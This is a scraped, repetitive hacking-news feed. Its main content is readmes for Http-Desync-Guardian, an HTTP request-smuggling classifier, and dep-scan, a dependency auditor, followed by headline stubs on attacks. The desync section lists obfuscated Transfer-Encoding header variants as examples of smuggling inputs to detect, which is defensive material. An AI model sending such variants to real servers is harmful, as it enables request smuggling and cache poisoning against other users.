Hacking Articles Tips Tricks Videos Tutorials
Kali Linux Tutorials Http-Desync-Guardian – Analyze HTTP Requests To Minimize Risks Of HTTP Desync Attacks Http-Desync-Guardian is to Analyze HTTP Requests To Minimize Risks Of HTTP Desync Attacks. HTTP/1.1went through a long evolution since 1991 to 2014:…
onization. Recommended
ClassificationDefensive modeStrictest modeCompliantAllowedAllowedAcceptableAllowedBlockedAmbiguousAllowed¹BlockedSevereBlockedBlocked
¹ Route the requests but closes the client and target connections.
For
If you are concerned about potential impact, Monitoring mode offers a metrics-only approach to assess prior to switching. Classification Reasons*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
https://medium.com/@knownsec404team/protocol-layer-attack-http-request-smuggling-cc654535b6f 3.1 GET Request with CL != 0
https://portswigger.net/web-security/request-smuggling/exploiting See “Capturing other users’ requests” https://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf see “EXAMPLE #3” Both Content-Length and Transfer-Encoding are present (BothTeClPresent)
If a request containing both Content-Length and Transfer-Encoding was received, it means that the sender didn’t follow RFC, and thus there is a chance that request boundaries might be out of sync with the sender.
If a message is received with both a Transfer-Encoding and a Content-Length header field, the Transfer-Encoding overrides the Content-Length. Such a message might indica[...]
___________________________
@hacking_Attack
@Hacking_Video
http_desync_guardianModesClassificationDefensive modeStrictest modeCompliantAllowedAllowedAcceptableAllowedBlockedAmbiguousAllowed¹BlockedSevereBlockedBlocked
¹ Route the requests but closes the client and target connections.
For
Blockedrequests the client connection must be closed.If you are concerned about potential impact, Monitoring mode offers a metrics-only approach to assess prior to switching. Classification Reasons*
Compliant* Compliant– a compliant request*
Acceptable* NonCompliantHeader– non-essential header containing a non-ASCII or control characters (CTL) – i.e. special invisible characters.*
SpaceInUri– unescaped space in the URI*
NonCompliantVersion– version which contains extra spaces, missing (i.e. HTTP/0.9) or matches HTTP/1.[2-9]*
GetHeadZeroContentLength– GET/HEAD request with a “Content-Length: 0” header*
Ambiguous* EmptyHeader– if there is an empty header or a line with whitespaces only in the request*
AmbiguousUri– an URI containing CTL characters*
UndefinedContentLengthSemantics– Content-Length for GET/HEAD requests*
UndefinedTransferEncodingSemantics– Transfer-Encoding for GET/HEAD requests*
DuplicateContentLength– duplicated Content-Length header (same value)*
BothTeClPresent– both Transfer-Encoding and Content-Length are present in the request*
SuspiciousHeader– a header that can be normalized to Transfer-Encodingor Content-Lengthusing common text normalization techniques (sanitation, case normalization, delimiters normalization).*
Severe* BadHeader– header containing null-character or CR*
BadUri– URI containing null-character or CR*
BadVersion– malformed version*
MultipleContentLength– different Content-Length headers*
BadContentLength– a non-parseable value or an invalid number*
MultipleTransferEncodingChunked– multiple Transfer-Encoding: chunked headers*
BadTransferEncoding– unknown Transfer-Encoding value*
BadMethod– malformed method*
Parsingraw-requests*
NonCrLfLineTermination(Acceptable) – allowing “\n” line termination (similar to Nginx).*
MultilineHeader(Ambiguous) – multi-line headers are non RFC compliant (except Content-Type)*
PartialHeaderLine(Ambiguous) – if a header line was not terminated*
MissingLastEmptyLine(Ambiguous) – there is no empty line at the end of request*
MissingHeaderColon(Ambiguous) – header line doesn’t have colon separator*
MissingUri(Ambiguous) – there is no URI in the request line Details on certain classifications Undefined Content-Length/Transfer-Encoding Semantics (UndefinedTransferEncodingSemantics, UndefinedContentLengthSemantics)A payload within a GET/HEAD request message has no defined semantics. https://tools.ietf.org/html/rfc7231#section-4.3https://medium.com/@knownsec404team/protocol-layer-attack-http-request-smuggling-cc654535b6f 3.1 GET Request with CL != 0
https://portswigger.net/web-security/request-smuggling/exploiting See “Capturing other users’ requests” https://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf see “EXAMPLE #3” Both Content-Length and Transfer-Encoding are present (BothTeClPresent)
If a request containing both Content-Length and Transfer-Encoding was received, it means that the sender didn’t follow RFC, and thus there is a chance that request boundaries might be out of sync with the sender.
If a message is received with both a Transfer-Encoding and a Content-Length header field, the Transfer-Encoding overrides the Content-Length. Such a message might indica[...]
___________________________
@hacking_Attack
@Hacking_Video
IETF Datatracker
RFC 7231: Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content
The Hypertext Transfer Protocol (HTTP) is a stateless \%application- level protocol for distributed, collaborative, hypertext information systems. This document defines the semantics of HTTP/1.1 messages, as expressed by request methods, request header fields…
Hacking Articles Tips Tricks Videos Tutorials
Kali Linux Tutorials Dep-Scan : Fully Open-Source Security Audit For Project Dependencies dep-scan is a fully open-source security audit tool for project dependencies based on known vulnerabilities, advisories and license limitations. Both local repositories…
t
dep-scan uses cdxgen command internally to create Software Bill-of-Materials (SBoM) file for the project. This is then used for performing the scans.
The following projects and package-dependency format is supported by cdxgen.
LanguagePackage formatnode.jspackage-lock.json, pnpm-lock.yaml, yarn.lock, rush.jsjavamaven (pom.xml [1]), gradle (build.gradle, .kts), scala (sbt)phpcomposer.lockpythonsetup.py, requirements.txt [2], Pipfile.lock, poetry.lock, bdist_wheel, .whlgobinary, go.mod, go.sum, Gopkg.lockrubyGemfile.lock, gemspecrustCargo.toml, Cargo.lock.Net.csproj, packages.config, project.assets.json, packages.lock.jsondocker / oci imageAll supported languages excluding OS packages
NOTE
The docker image for dep-scan currently doesn’t bundle suitable java and maven commands required for bom generation. To workaround this limitation, you can –
* Use python-based execution from a VM containing the correct versions for java, maven and gradle.
* Generate the bom file by invoking
Refer to this example yaml configuration for integrating dep-scan with Azure Pipelines. The build step would perform the scan and display the report inline as shown below:
https://blogger.googleusercontent.com/img/a/AVvXsEh-pjxjO4AFRU5NvapTl_mcVXj_I6Q51VvE8R0OXsZpe0k9msVD1sIPfujKeS_xT-X7HHc_nsertaq93ujnlmJq250kYjzNN4mUPBLcNw6L2f_ZXTQqLG7ml7wUbc6uHwDFYlFJlDrQfPs_JAF-DfFUol4nJCZAZxkYyhR5jQ9N4P6HzqFsttHnqHtO=s2826
Integration with GitHub Actions
This tool can be used with GitHub Actions using this action.
This repo self-tests itself with both sast-scan and dep-scan! Check the GitHub workflow file of this repo.
* name: Self dep-scan
uses: AppThreat/dep-scan-action@master
env:
VDB_HOME: ${{ github.workspace }}/db
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
* Customisation through environment variablesThe following environment variables can be used to customise the behaviour.
* VDB_HOME – Directory to use for caching database. For docker based execution, this directory should get mounted as a volume from the host
* NVD_START_YEAR – Default: 2018. Supports upto 2002
* GITHUB_PAGE_COUNT – Default: 2. Supports upto 20 GitHub Security Advisory
To download security advisories from GitHub, a personal access token with the following scope is necessary.
* read:packages
export GITHUB_TOKEN=””
Package Risk Audit
Use
Example to check if private packages with namespaces @appthreat and @shiftleft are not accidentally made public use the below argument.
___________________________
@hacking_Attack
@Hacking_Video
dep-scan uses cdxgen command internally to create Software Bill-of-Materials (SBoM) file for the project. This is then used for performing the scans.
The following projects and package-dependency format is supported by cdxgen.
LanguagePackage formatnode.jspackage-lock.json, pnpm-lock.yaml, yarn.lock, rush.jsjavamaven (pom.xml [1]), gradle (build.gradle, .kts), scala (sbt)phpcomposer.lockpythonsetup.py, requirements.txt [2], Pipfile.lock, poetry.lock, bdist_wheel, .whlgobinary, go.mod, go.sum, Gopkg.lockrubyGemfile.lock, gemspecrustCargo.toml, Cargo.lock.Net.csproj, packages.config, project.assets.json, packages.lock.jsondocker / oci imageAll supported languages excluding OS packages
NOTE
The docker image for dep-scan currently doesn’t bundle suitable java and maven commands required for bom generation. To workaround this limitation, you can –
* Use python-based execution from a VM containing the correct versions for java, maven and gradle.
* Generate the bom file by invoking
cdxgencommand locally and subsequently passing this to dep-scanvia the --bomargument. Integration with CI environments Integration with Azure DevOpsRefer to this example yaml configuration for integrating dep-scan with Azure Pipelines. The build step would perform the scan and display the report inline as shown below:
https://blogger.googleusercontent.com/img/a/AVvXsEh-pjxjO4AFRU5NvapTl_mcVXj_I6Q51VvE8R0OXsZpe0k9msVD1sIPfujKeS_xT-X7HHc_nsertaq93ujnlmJq250kYjzNN4mUPBLcNw6L2f_ZXTQqLG7ml7wUbc6uHwDFYlFJlDrQfPs_JAF-DfFUol4nJCZAZxkYyhR5jQ9N4P6HzqFsttHnqHtO=s2826
Integration with GitHub Actions
This tool can be used with GitHub Actions using this action.
This repo self-tests itself with both sast-scan and dep-scan! Check the GitHub workflow file of this repo.
* name: Self dep-scan
uses: AppThreat/dep-scan-action@master
env:
VDB_HOME: ${{ github.workspace }}/db
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
* Customisation through environment variablesThe following environment variables can be used to customise the behaviour.
* VDB_HOME – Directory to use for caching database. For docker based execution, this directory should get mounted as a volume from the host
* NVD_START_YEAR – Default: 2018. Supports upto 2002
* GITHUB_PAGE_COUNT – Default: 2. Supports upto 20 GitHub Security Advisory
To download security advisories from GitHub, a personal access token with the following scope is necessary.
* read:packages
export GITHUB_TOKEN=””
Package Risk Audit
--risk-auditargument enables package risk audit. Currently, only npm and pypi packages are supported in this mode. A number of risk factors are identified and assigned weights to compute a final risk score. Packages that then exceed a maximum risk score (config.pkg_max_risk_score) are presented in a table.Use
--private-nsto specify the private package namespace that should be checked for dependency confusion type issues where a private package is available on public npm/pypi registry.Example to check if private packages with namespaces @appthreat and @shiftleft are not accidentally made public use the below argument.
--private-ns appthreat,shiftleft Risk categoryDefault WeightReasonpkg_private_on_public_registry4Private package is available on a public registrypkg_min_versions2Packages with less than 3 versions represent an extreme where they could be either super stable or quite recent. Special heuristics are applied to ignore older stable packagesmod_create_min_seconds1Less than 12 hours difference between modified and creation time. This indicates that the upload had a defect that had to be rectified immediately. Sometimes, such a rapid update could also be maliciouslatest_now_min_seconds0.5Less than 12 hours difference between the latest version and the current time. Depending on the package such a latest version may or may not be desirablelatest_n[...]___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
onization. Recommended http_desync_guardianModes ClassificationDefensive modeStrictest modeCompliantAllowedAllowedAcceptableAllowedBlockedAmbiguousAllowed¹BlockedSevereBlockedBlocked ¹ Route the requests but closes the client and target connections. For…
te an attempt to perform request smuggling (Section 9.5) or response splitting (Section 9.4) and ought to be handled as an error. A sender MUST remove the received Content-Length field prior to forwarding such a message downstream.
https://tools.ietf.org/html/rfc7230#section-3.3.2 Multi-line headers (MultilineHeader)
Multi-line headers have been deprecated in RFC 7230, and different engines may either support it or not, which provides malicious actors a toolkit to trick parser to “see” headers that are not there or vice versa. That’s why we mark requests containing multi-line headers as Ambiguous (except the Content-Type header).
Historically, HTTP header field values could be extended over multiple lines by preceding each extra line with at least one space or horizontal tab (obs-fold). This specification deprecates such line folding except within the message/http media type (Section 8.3.1). A sender MUST NOT generate a message that includes line folding (i.e., that has any field-value that contains a match to the obs-fold rule) unless the message is intended for packaging within the message/http media type.
https://tools.ietf.org/html/rfc7230#section-3.2.4 Multiple Transfer-Encoding Chunked (MultipleTransferEncodingChunked)
A sender MUST NOT apply chunked more than once to a message body
https://tools.ietf.org/html/rfc7230#section-3.3.1 Multiple Content-Length Headers (MultipleContentLength, DuplicateContentLength)
If there are multiple different Content-Length headers (different values) the request is marked as Severe. In the case of multiple but same values, it falls into DuplicateContentLength category (marked as Ambiguous).
If a message is received that has multiple Content-Length header fields with field-values consisting of the same decimal value, or a single Content-Length header field with a field value containing a list of identical decimal values (e.g., “Content-Length: 42, 42”), indicating that duplicate Content-Length header fields have been generated or combined by an upstream message processor, then the recipient MUST either reject the message as invalid or replace the duplicated field-values with a single valid Content-Length field containing that decimal value prior to determining the message body length or forwarding the message.
https://tools.ietf.org/html/rfc7230#section-3.3.2 Suspicious headers (SuspiciousHeader)
There is a range of attacks to masquerade Transfer-Encoding and Content-Length headers, so some engines in the chain will see them while others won’t. For example:
Transfer-Encoding : chunked
Content-Length: 100
In this case, some engines may reject this request, as it’s not RFC compliant. Some may sanitize the space before the colon and treat as it has “Transfer-Encoding: chunked” while some may see “Transfer-Encoding[space]” and ignore it. It is the simplest case to illustrate this idea, but there are many others. For instance:
Transfer-Encodıng: chunked
Small Dotless I becomes ASCII “I” on upper-case transformation which may trick some engines. Or have a CTL character:
Transfer_Encoding: chunked
\x01Transfer-Encoding: chunked
Transfer-Encoding\b: chunked
Some engines may normalize delimiters or non-letters, e.g., using regular expressions, etc. (especially using standard string trimming routines that may have different behaviors in different platforms).
To mitigate these risks, we determine the similarity of headers to
There are two types of mitigations:
* Reject request with 400 and close the connection
* Serve the request but disable connection re-use on both front-end and back-end.
Why connection is closed after a
In this case, we cannot establish request boundaries and tell when the next request starts.
Why connections are both FE/BE connections closed af[...]
___________________________
@hacking_Attack
@Hacking_Video
https://tools.ietf.org/html/rfc7230#section-3.3.2 Multi-line headers (MultilineHeader)
Multi-line headers have been deprecated in RFC 7230, and different engines may either support it or not, which provides malicious actors a toolkit to trick parser to “see” headers that are not there or vice versa. That’s why we mark requests containing multi-line headers as Ambiguous (except the Content-Type header).
Historically, HTTP header field values could be extended over multiple lines by preceding each extra line with at least one space or horizontal tab (obs-fold). This specification deprecates such line folding except within the message/http media type (Section 8.3.1). A sender MUST NOT generate a message that includes line folding (i.e., that has any field-value that contains a match to the obs-fold rule) unless the message is intended for packaging within the message/http media type.
https://tools.ietf.org/html/rfc7230#section-3.2.4 Multiple Transfer-Encoding Chunked (MultipleTransferEncodingChunked)
A sender MUST NOT apply chunked more than once to a message body
https://tools.ietf.org/html/rfc7230#section-3.3.1 Multiple Content-Length Headers (MultipleContentLength, DuplicateContentLength)
If there are multiple different Content-Length headers (different values) the request is marked as Severe. In the case of multiple but same values, it falls into DuplicateContentLength category (marked as Ambiguous).
If a message is received that has multiple Content-Length header fields with field-values consisting of the same decimal value, or a single Content-Length header field with a field value containing a list of identical decimal values (e.g., “Content-Length: 42, 42”), indicating that duplicate Content-Length header fields have been generated or combined by an upstream message processor, then the recipient MUST either reject the message as invalid or replace the duplicated field-values with a single valid Content-Length field containing that decimal value prior to determining the message body length or forwarding the message.
https://tools.ietf.org/html/rfc7230#section-3.3.2 Suspicious headers (SuspiciousHeader)
There is a range of attacks to masquerade Transfer-Encoding and Content-Length headers, so some engines in the chain will see them while others won’t. For example:
Transfer-Encoding : chunked
Content-Length: 100
In this case, some engines may reject this request, as it’s not RFC compliant. Some may sanitize the space before the colon and treat as it has “Transfer-Encoding: chunked” while some may see “Transfer-Encoding[space]” and ignore it. It is the simplest case to illustrate this idea, but there are many others. For instance:
Transfer-Encodıng: chunked
Small Dotless I becomes ASCII “I” on upper-case transformation which may trick some engines. Or have a CTL character:
Transfer_Encoding: chunked
\x01Transfer-Encoding: chunked
Transfer-Encoding\b: chunked
Some engines may normalize delimiters or non-letters, e.g., using regular expressions, etc. (especially using standard string trimming routines that may have different behaviors in different platforms).
To mitigate these risks, we determine the similarity of headers to
Transfer-Encodingand Content-Length and mark requests as Ambiguous if any of these deviations are detected. MitigationsThere are two types of mitigations:
* Reject request with 400 and close the connection
* Serve the request but disable connection re-use on both front-end and back-end.
Why connection is closed after a
SevererequestIn this case, we cannot establish request boundaries and tell when the next request starts.
Why connections are both FE/BE connections closed af[...]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
t dep-scan uses cdxgen command internally to create Software Bill-of-Materials (SBoM) file for the project. This is then used for performing the scans. The following projects and package-dependency format is supported by cdxgen. LanguagePackage formatnode.jspackage…
ow_max_seconds0.5Package versions that are over 6 years old are in use. Such packages might have vulnerable dependencies that are known or yet to be foundpkg_min_maintainers2Package has less than 2 maintainers. Many opensource projects have only 1 or 2 maintainers so special heuristics are used to ignore older stable packagespkg_min_users0.25Package has less than 2 npm userspkg_install_scripts2Package runs a custom pre or post installation scripts. This is often malicious and a downside of npm.pkg_node_version0.5Package supports outdated version of node such as 0.8, 0.10, 4 or 6.x. Such projects might have prototype pollution or closure related vulnerabilitiespkg_scope4 or 0.5Packages that are used directly in the application (required scope) gets a score with a weight of 4. Optional packages get a score of 0.25deprecated1Latest version is deprecated
Refer to
A parameter called
All parameters can be customized by using environment variables. For eg:
export PKG_MIN_VERSIONS=4 to increase and set the minimum versions category to 4. Download
___________________________
@hacking_Attack
@Hacking_Video
Refer to
pkg_query.py::get_category_scoremethod for the risk formula. Automatic adjustmentA parameter called
created_now_quarantine_secondsis used to identify packages that are safely past the quarantine period (1 year). Certain risks such as pkg_min_versionsand pkg_min_maintainersare suppressed for packages past the quarantine period. This adjustment helps reduce noise since it is unlikely that a malicious package can exist in a registry unnoticed for over a year. Configuring weightsAll parameters can be customized by using environment variables. For eg:
export PKG_MIN_VERSIONS=4 to increase and set the minimum versions category to 4. Download
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
te an attempt to perform request smuggling (Section 9.5) or response splitting (Section 9.4) and ought to be handled as an error. A sender MUST remove the received Content-Length field prior to forwarding such a message downstream. https://tools.ietf.org…
ter an Ambiguous request?
Let’s start with not re-using a backend connection example:
https://blogger.googleusercontent.com/img/a/AVvXsEiOzGB4IJiglVMcDR2v-h7aafwSjQ49POoVbMuuL4MjjwKjobRQHpxKX9G_7209VUx-yXP2AuB318RS0kTiqJE3IL5OgBTtaXqAt4OocXDFQtG2anLEVrBBA3kob1A-QNg9nTMkei6F_1Ur4Q4B6Ad4pR_dozakVlJehrqWyzGjPTFE_7kdJT-IBx6F=s962
1. Attacker sends a request, such as Proxy only sees POST /foo while backend also sees GET /poison
2. However Proxy marks the request as Ambiguous
3. Proxy closes the connection after the response
4. The /poison response is dropped as the connection is not going to be re-used.
This seems to be efficient, but falls short if there is a layer in front of the proxy:
https://blogger.googleusercontent.com/img/a/AVvXsEiAuDln_IlMM_PtGdmi9aDIBIdUZxJStGXqabf_KKEnxH4Kt08s0Yatc2pPH6AyVZ8Df42rw6pNKPxAT6Tnh5jqhYOcZTSqBS3Xsx8_173XoQoeMgqLzkhoGq0qQTX8mSLGSjrbubTMy_VFvBhXuK2XaOcBkYExrh4Ldqfh_5Lxi7GkA5NCWVEhSn--=s1346
1. In this case let’s assume Desync happens between CDN and the Proxy and Proxy marks the request as Ambiguous
2. While Proxy closes the BE connection, it’s not helpful
3. The /poison response is still served via re-used front-end connection
But if both FE/BE connections are closed, then HTTP Desync is prevented:
https://blogger.googleusercontent.com/img/a/AVvXsEjoc293EV4nxod5LQcZ9zMWdw0_Rv9B45OhSJ_iLy0rszrCcjF2q8jbTHfOrljNK4oW_dIvfjCw-O470EciXgOS14wba20CApTDAI2Md1xPLzFRSNqhIFiYYNiPZsdWnLiLmuKBG75eLxEv61BfVOmbDfeh2M1ac1AMbwWNGcNcLmjf5Ho9_uFTlbCj=s1315
1. Same as in the previous example, let’s assume Desync happens between CDN and the Proxy and Proxy marks the request as Ambiguous
2. Now Proxy closes both FE/BE connections.
3. The /poison response is dropped. Usage from C
This library is designed to be primarily used from HTTP engines written in
1. Install cbindgen:
* Run
* Run
3. Run
Learn more: generic and Nginx examples.
include “http_desync_guardian.h”
http_engine_request_t – already parsed by the HTTP engine
*/
static int check_request(http_engine_request_t *req) {
http_desync_guardian_request_t guardian_request = construct_http_desync_guardian_from(req);
http_desync_guardian_verdict_t verdict = {0};
http_desync_guardian_analyze_request(&guardian_request, &verdict);
switch (verdict.tier) { case REQUEST_SAFETY_TIER_COMPLIANT:
// The request is good. green light
break;
case REQUEST_SAFETY_TIER_ACCEPTABLE:
// Reject, if mode == STRICTEST
// Otherwise, OK
break;
case REQUEST_SAFETY_TIER_AMBIGUOUS:
// The request is ambiguous.
// Reject, if mode == STRICTEST
// Otherwise send it, but don’t reuse both FE/BE connections.
break;
case REQUEST_SAFETY_TIER_SEVERE:
// Send 400 and close the FE connection.
break;
default:
// unreachable code
abort();
}
} Download
___________________________
@hacking_Attack
@Hacking_Video
Let’s start with not re-using a backend connection example:
https://blogger.googleusercontent.com/img/a/AVvXsEiOzGB4IJiglVMcDR2v-h7aafwSjQ49POoVbMuuL4MjjwKjobRQHpxKX9G_7209VUx-yXP2AuB318RS0kTiqJE3IL5OgBTtaXqAt4OocXDFQtG2anLEVrBBA3kob1A-QNg9nTMkei6F_1Ur4Q4B6Ad4pR_dozakVlJehrqWyzGjPTFE_7kdJT-IBx6F=s962
1. Attacker sends a request, such as Proxy only sees POST /foo while backend also sees GET /poison
2. However Proxy marks the request as Ambiguous
3. Proxy closes the connection after the response
4. The /poison response is dropped as the connection is not going to be re-used.
This seems to be efficient, but falls short if there is a layer in front of the proxy:
https://blogger.googleusercontent.com/img/a/AVvXsEiAuDln_IlMM_PtGdmi9aDIBIdUZxJStGXqabf_KKEnxH4Kt08s0Yatc2pPH6AyVZ8Df42rw6pNKPxAT6Tnh5jqhYOcZTSqBS3Xsx8_173XoQoeMgqLzkhoGq0qQTX8mSLGSjrbubTMy_VFvBhXuK2XaOcBkYExrh4Ldqfh_5Lxi7GkA5NCWVEhSn--=s1346
1. In this case let’s assume Desync happens between CDN and the Proxy and Proxy marks the request as Ambiguous
2. While Proxy closes the BE connection, it’s not helpful
3. The /poison response is still served via re-used front-end connection
But if both FE/BE connections are closed, then HTTP Desync is prevented:
https://blogger.googleusercontent.com/img/a/AVvXsEjoc293EV4nxod5LQcZ9zMWdw0_Rv9B45OhSJ_iLy0rszrCcjF2q8jbTHfOrljNK4oW_dIvfjCw-O470EciXgOS14wba20CApTDAI2Md1xPLzFRSNqhIFiYYNiPZsdWnLiLmuKBG75eLxEv61BfVOmbDfeh2M1ac1AMbwWNGcNcLmjf5Ho9_uFTlbCj=s1315
1. Same as in the previous example, let’s assume Desync happens between CDN and the Proxy and Proxy marks the request as Ambiguous
2. Now Proxy closes both FE/BE connections.
3. The /poison response is dropped. Usage from C
This library is designed to be primarily used from HTTP engines written in
C/C++.1. Install cbindgen:
cargo install --force cbindgen2. Generate the header file:* Run
cbindgen --output http_desync_guardian.h --lang cfor C.* Run
cbindgen --output http_desync_guardian.h --lang c++for C++.3. Run
cargo build --release. The binaries are in ./target/release/libhttp_desync_guardian.*files.Learn more: generic and Nginx examples.
include “http_desync_guardian.h”
http_engine_request_t – already parsed by the HTTP engine
*/
static int check_request(http_engine_request_t *req) {
http_desync_guardian_request_t guardian_request = construct_http_desync_guardian_from(req);
http_desync_guardian_verdict_t verdict = {0};
http_desync_guardian_analyze_request(&guardian_request, &verdict);
switch (verdict.tier) { case REQUEST_SAFETY_TIER_COMPLIANT:
// The request is good. green light
break;
case REQUEST_SAFETY_TIER_ACCEPTABLE:
// Reject, if mode == STRICTEST
// Otherwise, OK
break;
case REQUEST_SAFETY_TIER_AMBIGUOUS:
// The request is ambiguous.
// Reject, if mode == STRICTEST
// Otherwise send it, but don’t reuse both FE/BE connections.
break;
case REQUEST_SAFETY_TIER_SEVERE:
// Send 400 and close the FE connection.
break;
default:
// unreachable code
abort();
}
} Download
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Turning a web browser extension into a botnet
https://external-preview.redd.it/dmNDaQbix-b1JK_8hJOkoag8_FsIBJxjmcy9sm60hq8.jpg?width=640&crop=smart&auto=webp&s=fcf9059c8b082e8ee9f073e309e2c7a165609586 submitted by /u/z0mbie42_
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Turning a web browser extension into a botnet
https://external-preview.redd.it/dmNDaQbix-b1JK_8hJOkoag8_FsIBJxjmcy9sm60hq8.jpg?width=640&crop=smart&auto=webp&s=fcf9059c8b082e8ee9f073e309e2c7a165609586 submitted by /u/z0mbie42_
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Turning a web browser extension into a botnet
Posted in r/hacking by u/z0mbie42_ • 1 point and 0 comments
hacking: security in practice
cyber security
i dont know if this is right place to ask about it but i have a big question . i am currently a student of 4 year cyber security degree. so my question after completing everything can i work from home in some kind of cyber security job
submitted by /u/UnkownWithUnkownprsn
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
cyber security
i dont know if this is right place to ask about it but i have a big question . i am currently a student of 4 year cyber security degree. so my question after completing everything can i work from home in some kind of cyber security job
submitted by /u/UnkownWithUnkownprsn
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
cyber security
i dont know if this is right place to ask about it but i have a big question . i am currently a student of 4 year cyber security degree. so my...
Hacking on Medium
The new CHERI-enabled Morello boards — entirely new hardware making it harder for bad actors to…
https://cdn-images-1.medium.com/max/2600/1*TNZKzQQBjTdz6LX7c0FEzw.jpeg
How SRI is helping transform cybersecurity
Continue reading on The Dish »
___________________________
@hacking_Attack
@Hacking_Video
The new CHERI-enabled Morello boards — entirely new hardware making it harder for bad actors to…
https://cdn-images-1.medium.com/max/2600/1*TNZKzQQBjTdz6LX7c0FEzw.jpeg
How SRI is helping transform cybersecurity
Continue reading on The Dish »
___________________________
@hacking_Attack
@Hacking_Video
Medium
The new CHERI-enabled Morello boards — entirely new hardware making it harder for bad actors to access our data
How SRI is helping transform cybersecurity
Hacking on Medium
How Russian hackers are coming after you, personally
https://cdn-images-1.medium.com/max/2600/0*BKzxps4UXVaScWSZ
The Russian state runs a skilled, persistent, large-scale hacking operation. There are numerous examples of operations which have been…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How Russian hackers are coming after you, personally
https://cdn-images-1.medium.com/max/2600/0*BKzxps4UXVaScWSZ
The Russian state runs a skilled, persistent, large-scale hacking operation. There are numerous examples of operations which have been…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How Russian hackers are coming after you, personally
The Russian state runs a skilled, persistent, large-scale hacking operation. There are numerous examples of operations which have been…
Hacking on Medium
Attacking Kerberos Constrained Delegation
https://cdn-images-1.medium.com/max/2600/1*hqq8PJx9SS9fpgRfiACvHQ.jpeg
Trust this user/computer for delegation to specified services only
Continue reading on R3d Buck3T »
___________________________
@hacking_Attack
@Hacking_Video
Attacking Kerberos Constrained Delegation
https://cdn-images-1.medium.com/max/2600/1*hqq8PJx9SS9fpgRfiACvHQ.jpeg
Trust this user/computer for delegation to specified services only
Continue reading on R3d Buck3T »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Attacking Kerberos Constrained Delegation
Trust this user/computer for delegation to specified services only
Hacking on Medium
Cyber Security — An emerging computer domain
https://cdn-images-1.medium.com/max/1920/1*zNQwAzAYcCyCous6VGvawQ.png
Introduction
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Cyber Security — An emerging computer domain
https://cdn-images-1.medium.com/max/1920/1*zNQwAzAYcCyCous6VGvawQ.png
Introduction
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Cyber Security — An emerging computer domain
Introduction
Hacking on Medium
The Complete Guide to Cyber Security and How You Can Protect Yourself From Hacks & Breaches.
https://cdn-images-1.medium.com/max/2600/1*oT1Uadw9D4wLJU5JJKPe5A.jpeg
Introduction:
In this article, we can learn The Complete Guide to Cyber Security and How You Can Protect Yourself From Hacks & Breaches,
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
The Complete Guide to Cyber Security and How You Can Protect Yourself From Hacks & Breaches.
https://cdn-images-1.medium.com/max/2600/1*oT1Uadw9D4wLJU5JJKPe5A.jpeg
Introduction:
In this article, we can learn The Complete Guide to Cyber Security and How You Can Protect Yourself From Hacks & Breaches,
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
The Complete Guide to Cyber Security and How You Can Protect Yourself From Hacks & Breaches.
Introduction: In this article, we can learn The Complete Guide to Cyber Security and How You Can Protect Yourself From Hacks & Breaches,
Hacking on Medium
Denial of Service Dog: A DIY Guide.
https://cdn-images-1.medium.com/max/1105/1*Ow46x_dQkHDjSwGYpIncew.png
chaotic walkies
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Denial of Service Dog: A DIY Guide.
https://cdn-images-1.medium.com/max/1105/1*Ow46x_dQkHDjSwGYpIncew.png
chaotic walkies
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Denial of Service Dog: A DIY Guide.
chaotic walkies
Hacking on Medium
DAO Hack: Ideation Workshop [Video + Slides]
https://cdn-images-1.medium.com/max/1920/1*OkDbwKT-OttjZJoAG-HwdQ.jpeg
On Tuesday, 8th March, we were delighted to host the Ideation Event for our DAO Hack.
Continue reading on Encode Club »
___________________________
@hacking_Attack
@Hacking_Video
DAO Hack: Ideation Workshop [Video + Slides]
https://cdn-images-1.medium.com/max/1920/1*OkDbwKT-OttjZJoAG-HwdQ.jpeg
On Tuesday, 8th March, we were delighted to host the Ideation Event for our DAO Hack.
Continue reading on Encode Club »
___________________________
@hacking_Attack
@Hacking_Video
Medium
DAO Hack: Ideation Workshop [Video + Slides]
On Tuesday, 8th March, we were delighted to host the Ideation Event for our DAO Hack.
Hacking on Medium
Actualizaciones de Windows 10 KB5011487 y KB5011485 lanzadas
https://cdn-images-1.medium.com/max/1200/0*UhaNIQF-sAT9giLa
PUBLICADO EN 9 MARZO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Actualizaciones de Windows 10 KB5011487 y KB5011485 lanzadas
https://cdn-images-1.medium.com/max/1200/0*UhaNIQF-sAT9giLa
PUBLICADO EN 9 MARZO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Actualizaciones de Windows 10 KB5011487 y KB5011485 lanzadas
PUBLICADO EN 9 MARZO, 2022POR EHACKING
Hacking Articles|Raj Chandel's Blog
Linux Privilege Escalation: DirtyPipe (CVE 2022-0847)
___________________________
@hacking_Attack
@Hacking_Video
Linux Privilege Escalation: DirtyPipe (CVE 2022-0847)
___________________________
@hacking_Attack
@Hacking_Video
Blogspot
Linux Privilege Escalation: DirtyPipe (CVE 2022-0847)
